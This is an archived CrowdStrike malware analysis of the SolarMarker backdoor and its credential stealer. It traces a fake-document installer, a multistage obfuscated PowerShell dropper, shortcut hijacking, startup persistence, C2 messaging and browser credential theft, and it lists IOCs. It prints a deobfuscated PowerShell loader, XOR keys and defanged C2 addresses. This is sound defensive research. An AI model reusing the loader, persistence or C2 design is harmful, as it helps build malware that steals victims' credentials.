{
	"id": "76ed4a9b-b3c5-4a70-bb0d-ecc1c1d747aa",
	"created_at": "2026-04-06T00:18:54.884906Z",
	"updated_at": "2026-04-10T13:11:37.810713Z",
	"deleted_at": null,
	"sha1_hash": "e4cdd942fe0de559e51d7b79a203592cf3e9f292",
	"title": "A Technical Analysis of SolarMarker Backdoor | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1041430,
	"plain_text": "A Technical Analysis of SolarMarker Backdoor | CrowdStrike\r\nBy Tom Simpson - Tom Henry - Seb Walla\r\nArchived: 2026-04-05 22:03:29 UTC\r\nIn this blog, we take a look at a recent detection that was blocked by the CrowdStrike Falcon® platform’s next-generation antivirus (NGAV). SolarMarker* backdoor features a multistage, heavily obfuscated PowerShell loader, which leads to a .NET compiled backdoor being executed. This blog details how the CrowdStrike Falcon® Complete™ team detected the binary using the Falcon UI, our deobfuscation of the initial stages, and how we collaborate with the CrowdStrike Intel team to conduct further analysis and protect our customers from emerging threats.\r\nFalcon Complete Triage\r\nOn Oct. 12, 2020, the Falcon Complete team began receiving detections for likely malicious PowerShell scripts affecting multiple customer environments. Falcon Prevent™ NGAV prevented the processes from running because the script displayed characteristics common to other known malicious scripts.\r\nFigure 1. Falcon UI showing detection and prevention.\r\nCommand lines associated with the detections were immediately flagged as suspicious because they were executing the contents of a temporary file, then removing the file immediately after running.\r\nFigure 2. SolarMarker PowerShell command line\r\nExamination of this activity through Falcon’s Process Explorer tree raised additional red flags because the source of the detection was files downloaded via web browsers that were executable but masquerading as document files.\r\nhttps://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/\r\nPage 1 of 9\n\nFigure 3. Process Explorer showing SolarMarker process execution chain and prevention. 
\r\nWhen reviewing the installer executable details (SHA256: 3e99b59df79d1ab9ff7386e209d9135192661042bcdf44dde85ff4687ff57d01), it was observed that the files were signed by a seemingly unrelated certificate signer with a recent first-seen date.\r\nFigure 4. SolarMarker related certificate details\r\nResearching the installer executable in public malware repositories established that the file was first uploaded a few days beforehand. Suspicions were further raised by the large file size (114MB) along with the executable masquerading as a Microsoft Word document. These suggested possible attempts to evade antivirus detection.\r\nFigure 5. SolarMarker installer executable icon\r\nThe installer also dropped legitimate binaries such as an application called “Docx2Rtf” (a known document converter) and a demo of “Expert PDF.” The Falcon Complete team concluded that the technique was used to convince victims that they had downloaded a corrupt document or required additional software to view the document.\r\nFigure 6. Docx2rtf Application\r\nFurther triage was performed using Falcon’s Real Time Response (RTR) mechanism to connect to an affected system and directly examine the PowerShell file referenced in the detection command line. The script performed an XOR decryption of data contained in a second similarly named text file that, when decoded, contained another obfuscated PowerShell script.\r\nFigure 7. SolarMarker PowerShell obfuscation.\r\nAlthough these processes were being blocked by the Falcon sensor, the Falcon Complete team decoded multiple levels of obfuscation and encryption and confirmed that the PowerShell script was malicious. The analysis identified persistence mechanisms and a command and control (C2) IP address within the decrypted payload of the script. 
Using these indicators of compromise (IOCs), the Falcon Complete team was able to verify that the malware was successfully blocked in all customer environments.\r\nFigure 8. Strings from SolarMarker payload\r\nThe investigation did not establish any clear link between targeted customers: The malware appeared across multiple different verticals, in different regions and countries, and affected customers of various sizes. Initially, the infection vector appeared to be from phishing, but no strong correlation with email client activity was observed, which usually occurs during phishing campaigns. In the initial analysis, the Falcon Complete team could not link the malicious files to any known malware families or threat actor campaigns and engaged the CrowdStrike Intelligence team to investigate further. Based on observed filenames in public malware repositories (e.g., Advanced-Mathematical-Concepts-Precalculus-With-Applications-Solutions.exe) and Falcon telemetry, the hypothesis is that the malware is delivered as a fake document download targeting users performing web searches for document files. CrowdStrike has observed a number of Google Sites hosted pages as lure sites for the malicious downloads. These sites advertise document downloads and are often highly ranked in search results. The use of Google Sites suggests attempts by the threat actors to increase search ranking. The malware installer filenames and lure sites have only been observed in English so far, and based on Falcon telemetry, it is clear that SolarMarker is most prevalent in Western countries, especially in the U.S.\r\nFigure 9. SolarMarker Infection Distribution\r\nThe executable with SHA256 hash 3e99b59df79d1ab9ff7386e209d9135192661042bcdf44dde85ff4687ff57d01 is an Inno Setup Installer. 
This program is the first stage in a multi-stage dropper chain leading to the SolarMarker backdoor. Figure 10 gives an overview of the malware’s dropper chain.\r\nFigure 10. Overview of the SolarMarker Dropper Chain\r\nThe installer uses Inno Setup’s Pascal Scripting feature to customize its actions. It will first extract two temporary files to %Tmp%\\\u003cunique\u003e.tmp\\\u003cfilename\u003e, where \u003cunique\u003e is a unique directory name. The two files are the following:\r\nFilename SHA256 hash\r\nDocx2Rtf.exe caf8e546f8c6ce56009d28b96c4c8229561d10a6dd89d12be30fa9021b1ce2f4\r\nwaste.dat d730b47b0e8ce6c093fb492d2483a45f8bc93cac234a592d34c09945653daf4d\r\nBoth files will be deleted once the installer completes. The file Docx2Rtf.exe is the document converter Docx2Rtf version 4.4, a benign file. The file waste.dat is 112 MB in size, but contains only zero bytes, indicating that the file was only included in the installer to increase its size, which is known to prevent detection by some security products. Once these two files are extracted, Docx2Rtf.exe is executed and the installer sleeps for five seconds. Then the installer checks if it is executed on one of its targeted operating system (OS) versions and exits if not. The targeted versions are Windows 8.1, Windows Server 2012 R2, Windows 10 and Windows Server 2016. After being certain about the OS, the installer decrypts a third stage and writes it to %Temp%\\\u003crandom\u003e.txt, where \u003crandom\u003e is a random 32-character hexadecimal string. The third stage is encrypted twice with different keys, and the installer will only decrypt it once. The decryption function named DECRYPTPS takes in a hex-encoded encrypted blob and a string-based key and performs a simple XOR operation. 
The function can be replicated in Python as follows:\r\nfrom binascii import unhexlify\r\n\r\ndef decryptps(enc_payload, key):\r\n    # enc_payload is the hex-encoded encrypted blob; key is a plain string\r\n    enc_payload = unhexlify(enc_payload)\r\n    key = key.encode(\"utf-8\")\r\n    res = \"\"\r\n    for i in range(0, len(enc_payload)):\r\n        cur_enc_byte = enc_payload[i]\r\n        # the key is repeated cyclically over the whole payload\r\n        key_byte = key[i % len(key)]\r\n        decrypted_byte = cur_enc_byte ^ key_byte\r\n        res += chr(decrypted_byte)\r\n    return res\r\nAfter saving the one-time-decrypted third stage, the installer writes a second-stage PowerShell script to %Temp%\\\u003crandom\u003e.txt and executes it. This second stage contains the path to the previously written third stage.\r\nSecond Stage\r\nThe second stage’s sole purpose is decrypting the one-time-decrypted third stage written by the installer. All PowerShell scripts observed throughout the dropper chain use the same decryption algorithm, which in Python looks as follows:\r\nimport base64\r\n\r\ndef powershell_xor_decrypt(base64_encoded_payload, key):\r\n    # base64_encoded_payload is the Base64 text embedded in the PowerShell stage; key is a plain string\r\n    encrypted_payload = base64.b64decode(base64_encoded_payload)\r\n    key = key.encode(\"utf-8\")\r\n    res = \"\"\r\n    for i in range(0, len(encrypted_payload)):\r\n        cur_enc_byte = encrypted_payload[i]\r\n        # the key is repeated cyclically over the whole payload\r\n        key_byte = key[i % len(key)]\r\n        decrypted_byte = cur_enc_byte ^ key_byte\r\n        res += chr(decrypted_byte)\r\n    return res\r\nThe second stage will use the above algorithm to Base64-decode the one-time-decrypted third stage and XOR it with the following key: ZleyoPSJVRHxIWGgnjbYmKUOvfQTsqMXhCtpzkdirBELcaDNwuAF. The decrypted third stage is subsequently executed using Invoke-Expression.\r\nThird Stage\r\nThe third stage drops a fourth stage to %AppDaTa%\\Microsoft\\\u003cRND4\u003e\\\u003cRND8\u003e.cmd, where \u003cRND4\u003e and \u003cRND8\u003e are four and eight random characters, respectively. 
Additionally, the third stage writes the Base64-decoded backdoor to %AppDaTa%\\microsoft\\\u003cRND4\u003e\\\u003cRND52\u003e, where \u003cRND4\u003e and \u003cRND52\u003e are four and 52 random characters, respectively. This Base64-decoded backdoor has the following SHA256 hash: 45ea9b5697517f7bdc5af83c62bb8de7821baef9463c466cfc0e881f21c32011\r\nFurthermore, the third stage modifies shortcuts (.LNK files) on the desktop of the current user and .LNK files that are shared by all users on their desktop. The third stage will alter some, but not all shortcuts to also execute a third stage, which is discussed below. A shortcut is changed only if its target path points to an existing file that has a file extension. Additionally, the shortcut is only modified when this target path does not contain the substring cmd.exe. Also, shortcuts with arguments are not altered. All other shortcuts are modified to execute their original target using cmd.exe but additionally run a fourth stage. 
Once the shortcuts have been modified, the third stage executes the fourth stage directly.\r\nFourth Stage\r\nThe following is a deobfuscated version of the fourth stage:\r\n$path_to_persist=$env:appdata+'\\microsoft\\windows\\start menu\\programs\\startup\\a7f9214c3844f0a883268d3853ba7.lnk';\r\nIf(-not(test-path $path_to_persist)){\r\n    $wscript_shell=new-object -comobject wscript.shell;\r\n    $shortcut=$wscript_shell.createshortcut($path_to_persist);\r\n    $shortcut.windowstyle=7;\r\n    $shortcut.targetpath=\u003cpath to fourth stage\u003e;\r\n    $shortcut.save();\r\n};\r\nIf((get-process -name '*powershell*').count -lt 15){\r\n    $xor_key=\"XlA7P25AfkVNcUBzKnJgXk5FbXk+VmNsfHdXcVo0dlkpIX5vVXh3cHVlK2h+aGxSTkZ3MjdWYXB8NkFVdCtCNTFvVHNQb3pPU00ycUA5YGF1OX5\r\n    $decrypted_backdoor=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64stri\r\n    For($i=0;$i -lt $decrypted_backdoor.count;){\r\n        For($j=0;$j -lt $xor_key.length;$j++){\r\n            $decrypted_backdoor[$i]=$decrypted_backdoor[$i] -bxor $xor_key[$j];\r\n            $i++;\r\n            If($i -ge $decrypted_backdoor.count){\r\n                $j=$xor_key.length\r\n            }\r\n        }\r\n    };\r\n    [system.reflection.assembly]::load($decrypted_backdoor);\r\n    [d.m]::run()\r\n}\r\nThis script establishes persistence by creating a shortcut under the following path:\r\n%AppData%\\microsoft\\windows\\startmenu\\programs\\startup\\a7f9214c3844f0a883268d3853ba7.lnk\r\nThis shortcut then points to the fourth stage itself. Once persistence has been established, the fourth stage then Base64-decodes a path to the Base64-decoded backdoor. Recall that the Base64-decoded backdoor had been written to %AppDaTa%\\microsoft\\\u003cRND4\u003e\\\u003cRND52\u003e by the third stage. 
In the presented fourth stage sample, this Base64-encoded path is:\r\nQzpcVXNlcnNcZXhhbXBsZV91c2VyXEFwcERhdGFcUm9hbWluZ1xNSUNyb1NPZlRcU1lIclxPRnJTR1ZkVFdheGttS0llQW5Vb1p3Y0N5dmlzYlFOcVJ6dXBKRWhQZ01qdFhmRExs\r\nwhich decodes to the following path:\r\nC:\\Users\\example_user\\AppData\\Roaming\\MICroSOfT\\SYHr\\OFrSGVdTWaxkmKIeAnUoZwcCyvisbQNqRzupJEhPgMjtXfDLlHYB\r\nThe file referenced by this path is read and then XORed with the following key:\r\nXlA7P25AfkVNcUBzKnJgXk5FbXk+VmNsfHdXcVo0dlkpIX5vVXh3cHVlK2h+aGxSTkZ3MjdWYXB8NkFVdCtCNTFvVHNQb3pPU00ycUA5YGF1OX5+XnBgZmVzcW87eEFzRVA4bXFO\r\nThe result of this decryption is a .NET executable with the following SHA256 hash: ceb42fea3be898251028e2c5128a69451212bcb48a4871454c60dc2262426677\r\nFinally, the fourth stage loads the executable as a .NET assembly and calls the D::M.Run method.\r\nBackdoor\r\nThis Run function is the entry point of the SolarMarker backdoor (alias C2 Jupyter client). Initially, the backdoor generates a 32-byte random string as a victim ID and saves it under %AppData%\\AppData\\Roaming\\solarmarker.dat. Additionally, the malware collects information about the computer and sends an initial request to its C2 server at http\u003c:\u003e//45.135.232\u003c.\u003e131. Communication between the backdoor and its C2 servers is facilitated via a JSON-like protocol where each message is encrypted using the following hardcoded XOR key: 4qMpLcYfVM4eimGl4Qz7cxPiafbL9edWpM1O\r\nOnce encrypted, messages are Base64-encoded and sent via a POST request to the C2 server. The initial message contains the following information:\r\nKey Description\r\naction Request type for messages sent from backdoor to C2. 
In the initial message from the backdoor, this has value ping.\r\nhwid Uniquely identifies victim PC using a randomly generated string of length 32.\r\npc_name Machine name of the PC\r\nos_name Operating system version including service pack\r\narch CPU architecture\r\nrights Rights of the executing user\r\nworkgroup Workgroup of the PC\r\nversion Version of the backdoor. In the analyzed sample, this has value DR/1.0.\r\nprotocol_version Likely version of the C2 communication protocol. In the analyzed sample, this value is 1.\r\nThe C2 server then responds to this message using a task that is either of type status=command, status=file, or status=idle. Tasks of type idle contain nothing else but the status field. Task for command type:\r\nKey Description\r\nstatus Type of command from C2\r\ncommand Commands to execute using PowerShell\r\nTask for file type:\r\nKey Description\r\nstatus Type of command from C2\r\ntask_id Task ID likely used to reidentify a started task\r\ntype Type of file to be executed. This can either be the file extension exe or ps1.\r\nTasks of command type are directly executed via PowerShell and the backdoor waits 30 seconds before sending another initial message to request a new task. For file tasks, the client requests the file to execute using the following message:\r\nKey Description\r\naction The request type to retrieve a file is get_file.\r\nhwid Unique identifier for victim PC\r\ntask_id Task ID from the task which requested a file to be executed\r\nprotocol_version Version of the C2 communication protocol. In this sample, the version is 1.\r\nThe C2 then answers with a payload that is saved under %Temp%\\\u003cRND24\u003e.\u003cexe/ps1\u003e with the respective extension, where \u003cRND24\u003e are 24 random characters. Next, the payload is executed. 
After 30 seconds, the backdoor sends the following message to the C2:\r\nKey Description\r\naction The request type to report the execution of a file is change_status.\r\nhwid Unique identifier for victim PC\r\ntask_id Task ID from the task that requested a file to be executed\r\nis_success Always set to true, independent of the exit code of the executed payload.\r\nprotocol_version Version of the C2 communication protocol. In the observed sample, the version is 1.\r\nThe C2 is expected to respond with a new task to this message.\r\nCredential Harvester\r\nOn Oct. 15, 2020, CrowdStrike Intelligence observed the backdoor distributing a credential harvester. CrowdStrike Intelligence dubbed this malware SolarMarker Stealer (aka Jupyter Stealer). The stealer's first stage is a PowerShell script with the following SHA256 hash: 2a8bc51367801c87ca2c64fdad1d0b06f91bbbc4f0f16ad18dbc122fda3d1a87\r\nThis PowerShell script contains a Base64-encoded payload with the following SHA256 hash: 73dcbbf322b72e2cf675ca3356a7ece34e24108a82ad36eeb98596a35c8fdb16\r\nThis payload is Base64-decoded and then XORed using the following key:\r\nQH5WcmheMHRucV5TSDZUQHYpKG1eb29WQl5TITtHQHF2d3peMEE0NEBScGFiXlNgYURAc3pac0B7Tj9lXjFoRkBeb293S0B1ckJIXjBKSjleTXxnYV4wYj96Xm47eldAcXZ3fUB8\r\nThe resulting payload with SHA256 hash ce486097ad2491aba8b1c120f6d0aa23eaf59cf698b57d2113faab696d03c601 is a .NET based credential harvester configured for the C2 server https\u003c:\u003e//vincentolife\u003c.\u003ecom/j. The malware is capable of stealing passwords, cookies and form auto-completion data from Google Chrome and Mozilla Firefox. Additionally, the stealer extracts the certificate and key databases from Firefox. 
The stolen data is sent to the C2 at https\u003c:\u003e//vincentolife\u003c.\u003ecom/j/post?q= using a POST request, where the GET parameter q is a JSON array containing the following information about the victim PC:\r\nKey Description\r\nhwid Uniquely identifies victim PC using a randomly generated string of length 32. Saved in %userprofile%\\AppData\\Roaming\\solarmarker.dat\r\npn Machine name of the PC\r\nos Operating system version including service pack\r\nx CPU architecture\r\nprm Rights of the executing user\r\nver Likely version of the stealer. In the analyzed sample, this has value CSDN/1.8\r\nFurther, SolarMarker Stealer is capable of decrypting data for the current user that has been encrypted using Microsoft's Data Protection API.\r\nIndicators of Compromise\r\nFiles\r\nDescription Path if applicable SHA256 hash if applicable\r\nSecond stage %Temp%\\\u003crandom chars\u003e.txt Changes due to randomly generated path to third stage it contains\r\nEncrypted third stage %Temp%\\\u003crandom chars\u003e.txt e82a58e59321852c6857aa511472cbb7327822461a03e3c189304b2c36f17273\r\nThird stage None 2860a7b98dbfc4c10347187e79d7528a875dd71a893ce025190b57bcb1bcc0f0\r\nFourth stage %AppData%\\microsoft\\\u003cRND4\u003e\\\u003cRND8\u003e.cmd Changes due to randomly generated paths it contains\r\nEncrypted backdoor None b3e6a879d4ac3fff34b520f39994639df26e846087632fb7505e89a4da220868\r\nBase64-decoded backdoor %AppData%\\microsoft\\\u003cRND4\u003e\\\u003cRND52\u003e 45ea9b5697517f7bdc5af83c62bb8de7821baef9463c466cfc0e881f21c32011\r\nBackdoor None ceb42fea3be898251028e2c5128a69451212bcb48a4871454c60dc2262426677\r\nSolarMarker Stealer first stage %Temp%\\\u003cRND24\u003e.ps1 2a8bc51367801c87ca2c64fdad1d0b06f91bbbc4f0f16ad18dbc122fda3d1a87\r\nSolarMarker Stealer None 
ce486097ad2491aba8b1c120f6d0aa23eaf59cf698b57d2113faab696d03c601\r\nVictim ID %userprofile%\\AppData\\Roaming\\solarmarker.dat Changes due to randomly generated content\r\nNetwork\r\nDescription C2\r\nSolarMarker Backdoor C2 http\u003c:\u003e//45.135.232\u003c.\u003e131\r\nSolarMarker Stealer C2 https\u003c:\u003e//vincentolife\u003c.\u003ecom/j\r\n*The SolarMarker backdoor was originally named in public reporting in October 2020 and is not in any way related to the recent high-profile SUNBURST/SUNSPOT intrusion activity.\r\nAdditional Resources\r\nLearn how any size organization can achieve optimal security with Falcon Complete by visiting the product webpage.\r\nLearn about CrowdStrike’s comprehensive next-gen endpoint protection platform by visiting the Falcon products webpage.\r\nTest CrowdStrike next-gen AV for yourself: Start your free trial of Falcon Prevent.\r\nSource: https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/"
	],
	"report_names": [
		"solarmarker-backdoor-technical-analysis"
	],
	"threat_actors": [
		{
			"id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7",
			"created_at": "2022-10-25T16:07:23.704358Z",
			"updated_at": "2026-04-10T02:00:04.718034Z",
			"deleted_at": null,
			"main_name": "Harvester",
			"aliases": [],
			"source_name": "ETDA:Harvester",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Graphon",
				"Metasploit",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434734,
	"ts_updated_at": 1775826697,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e4cdd942fe0de559e51d7b79a203592cf3e9f292.pdf",
		"text": "https://archive.orkl.eu/e4cdd942fe0de559e51d7b79a203592cf3e9f292.txt",
		"img": "https://archive.orkl.eu/e4cdd942fe0de559e51d7b79a203592cf3e9f292.jpg"
	}
}